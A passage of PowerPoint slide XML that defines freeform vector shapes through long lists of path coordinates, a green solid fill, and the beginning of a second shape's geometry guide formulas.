                      <a:pt x="266" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="411" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="424" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="460" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="464" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="464" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="464" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="471" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="485" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="487" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="490" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="495" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="501" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="513" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="528" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="574" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="587" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="592" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="601" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="607" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="618" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="616" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="576" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="566" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="564" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="563" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="553" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="553" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="555" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="555" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="542" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="542" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="427"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="523" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="508" y="448"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="486" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="481" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="471" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="464" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="464"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="444" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="440" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="490"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="500"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="506"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="512"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="560"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="565"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="576"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="586"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="594"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="607"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="607"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="597"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="587"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="587"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="586"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="589"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="606"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="612"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="333" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="652"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="643"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="634"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="632"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="618"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="606"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="592"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="587"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="587"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="563"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="532"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="513"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="504"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="376" y="109"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="372" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="109"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36088" name="Freeform 221"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1566" y="2862"/>
                <a:ext cx="619" cy="652"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 307 w 619"/>
                  <a:gd name="T1" fmla="*/ 471 h 652"/>
                  <a:gd name="T2" fmla="*/ 273 w 619"/>
                  <a:gd name="T3" fmla="*/ 444 h 652"/>
                  <a:gd name="T4" fmla="*/ 253 w 619"/>
                  <a:gd name="T5" fmla="*/ 410 h 652"/>
                  <a:gd name="T6" fmla="*/ 255 w 619"/>
                  <a:gd name="T7" fmla="*/ 363 h 652"/>
                  <a:gd name="T8" fmla="*/ 221 w 619"/>
                  <a:gd name="T9" fmla="*/ 344 h 652"/>
                  <a:gd name="T10" fmla="*/ 208 w 619"/>
                  <a:gd name="T11" fmla="*/ 300 h 652"/>
                  <a:gd name="T12" fmla="*/ 173 w 619"/>
                  <a:gd name="T13" fmla="*/ 285 h 652"/>
                  <a:gd name="T14" fmla="*/ 136 w 619"/>
                  <a:gd name="T15" fmla="*/ 258 h 652"/>
                  <a:gd name="T16" fmla="*/ 102 w 619"/>
                  <a:gd name="T17" fmla="*/ 251 h 652"/>
                  <a:gd name="T18" fmla="*/ 60 w 619"/>
                  <a:gd name="T19" fmla="*/ 257 h 652"/>
                  <a:gd name="T20" fmla="*/ 41 w 619"/>
                  <a:gd name="T21" fmla="*/ 241 h 652"/>
                  <a:gd name="T22" fmla="*/ 15 w 619"/>
                  <a:gd name="T23" fmla="*/ 224 h 652"/>
                  <a:gd name="T24" fmla="*/ 12 w 619"/>
                  <a:gd name="T25" fmla="*/ 178 h 652"/>
                  <a:gd name="T26" fmla="*/ 51 w 619"/>
                  <a:gd name="T27" fmla="*/ 150 h 652"/>
                  <a:gd name="T28" fmla="*/ 73 w 619"/>
                  <a:gd name="T29" fmla="*/ 102 h 652"/>
                  <a:gd name="T30" fmla="*/ 63 w 619"/>
                  <a:gd name="T31" fmla="*/ 74 h 652"/>
                  <a:gd name="T32" fmla="*/ 66 w 619"/>
                  <a:gd name="T33" fmla="*/ 65 h 652"/>
                  <a:gd name="T34" fmla="*/ 108 w 619"/>
                  <a:gd name="T35" fmla="*/ 50 h 652"/>
                  <a:gd name="T36" fmla="*/ 132 w 619"/>
                  <a:gd name="T37" fmla="*/ 66 h 652"/>
                  <a:gd name="T38" fmla="*/ 158 w 619"/>
                  <a:gd name="T39" fmla="*/ 53 h 652"/>
                  <a:gd name="T40" fmla="*/ 157 w 619"/>
                  <a:gd name="T41" fmla="*/ 38 h 652"/>
                  <a:gd name="T42" fmla="*/ 169 w 619"/>
                  <a:gd name="T43" fmla="*/ 20 h 652"/>
                  <a:gd name="T44" fmla="*/ 208 w 619"/>
                  <a:gd name="T45" fmla="*/ 8 h 652"/>
                  <a:gd name="T46" fmla="*/ 220 w 619"/>
                  <a:gd name="T47" fmla="*/ 11 h 652"/>
                  <a:gd name="T48" fmla="*/ 226 w 619"/>
                  <a:gd name="T49" fmla="*/ 47 h 652"/>
                  <a:gd name="T50" fmla="*/ 260 w 619"/>
                  <a:gd name="T51" fmla="*/ 55 h 652"/>
                  <a:gd name="T52" fmla="*/ 291 w 619"/>
                  <a:gd name="T53" fmla="*/ 44 h 652"/>
                  <a:gd name="T54" fmla="*/ 330 w 619"/>
                  <a:gd name="T55" fmla="*/ 48 h 652"/>
                  <a:gd name="T56" fmla="*/ 359 w 619"/>
                  <a:gd name="T57" fmla="*/ 14 h 652"/>
                  <a:gd name="T58" fmla="*/ 382 w 619"/>
                  <a:gd name="T59" fmla="*/ 57 h 652"/>
                  <a:gd name="T60" fmla="*/ 356 w 619"/>
                  <a:gd name="T61" fmla="*/ 88 h 652"/>
                  <a:gd name="T62" fmla="*/ 366 w 619"/>
                  <a:gd name="T63" fmla="*/ 106 h 652"/>
                  <a:gd name="T64" fmla="*/ 392 w 619"/>
                  <a:gd name="T65" fmla="*/ 115 h 652"/>
                  <a:gd name="T66" fmla="*/ 424 w 619"/>
                  <a:gd name="T67" fmla="*/ 92 h 652"/>
                  <a:gd name="T68" fmla="*/ 455 w 619"/>
                  <a:gd name="T69" fmla="*/ 109 h 652"/>
                  <a:gd name="T70" fmla="*/ 464 w 619"/>
                  <a:gd name="T71" fmla="*/ 129 h 652"/>
                  <a:gd name="T72" fmla="*/ 501 w 619"/>
                  <a:gd name="T73" fmla="*/ 126 h 652"/>
                  <a:gd name="T74" fmla="*/ 548 w 619"/>
                  <a:gd name="T75" fmla="*/ 132 h 652"/>
                  <a:gd name="T76" fmla="*/ 601 w 619"/>
                  <a:gd name="T77" fmla="*/ 163 h 652"/>
                  <a:gd name="T78" fmla="*/ 618 w 619"/>
                  <a:gd name="T79" fmla="*/ 213 h 652"/>
                  <a:gd name="T80" fmla="*/ 580 w 619"/>
                  <a:gd name="T81" fmla="*/ 262 h 652"/>
                  <a:gd name="T82" fmla="*/ 557 w 619"/>
                  <a:gd name="T83" fmla="*/ 283 h 652"/>
